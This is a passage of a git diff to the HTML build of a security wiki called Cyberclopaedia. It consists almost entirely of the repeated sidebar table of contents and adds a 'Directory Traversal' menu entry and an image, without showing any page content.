      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -200,22 +200,6 @@

Prevention

- - diff --git a/docs/Exploitation/Web/Open Redirect.html b/docs/Exploitation/Web/Open Redirect.html index 0c9ed371..b9e53304 100644 --- a/docs/Exploitation/Web/Open Redirect.html +++ b/docs/Exploitation/Web/Open Redirect.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -197,22 +197,6 @@

Javas - - diff --git a/docs/Exploitation/Web/PHP Object Injection.html b/docs/Exploitation/Web/PHP Object Injection.html index 4f363e27..f1824ad3 100644 --- a/docs/Exploitation/Web/PHP Object Injection.html +++ b/docs/Exploitation/Web/PHP Object Injection.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -306,22 +306,6 @@

Prevention

- - diff --git a/docs/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png b/docs/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png new file mode 100644 index 00000000..8cd2889e Binary files /dev/null and b/docs/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png differ diff --git a/docs/Exploitation/Web/SQL Injection/Cheatsheets.html b/docs/Exploitation/Web/SQL Injection/Cheatsheets.html index afaecb40..b54f1c6f 100644 --- a/docs/Exploitation/Web/SQL Injection/Cheatsheets.html +++ b/docs/Exploitation/Web/SQL Injection/Cheatsheets.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
